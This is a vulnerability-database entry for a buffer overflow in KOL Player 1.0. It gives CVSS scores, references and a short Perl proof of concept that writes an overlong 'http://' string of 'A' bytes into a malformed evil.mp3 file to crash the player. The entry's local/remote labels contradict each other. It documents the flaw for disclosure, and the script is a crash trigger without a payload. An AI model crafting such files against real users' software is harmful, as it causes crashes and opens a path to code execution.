KOL Player 1.0 (.mp3 File) Local Buffer Overflow PoC

2009-08-27 / 2009-08-28
Credit: Evil.Man
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl # KOL Player 1.0 (.mp3) Local Buffer Overflow PoC # http://thaddy.co.uk/kolacmwaveplayer.zip ########################### # 0012F920 |00168370 ASCII "AAAA" # 0012F924 |41410004 # 0012F928 |41414141 # 0012F92C |41414141 # 0012F930 |41414141 # 0012F934 |41414141 # 0012F938 |41414141 # 0012F93C |41414141 # 0012F940 |41414141 # 0012F944 |41414141 # 0012F948 |41414141 ########################### my $crash="http://"."\x41" x 3200; open(myfile,'>>evil.mp3'); print myfile $crash; ###########################

References:

http://xforce.iss.net/xforce/xfdb/52629
http://www.milw0rm.com/exploits/9467


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top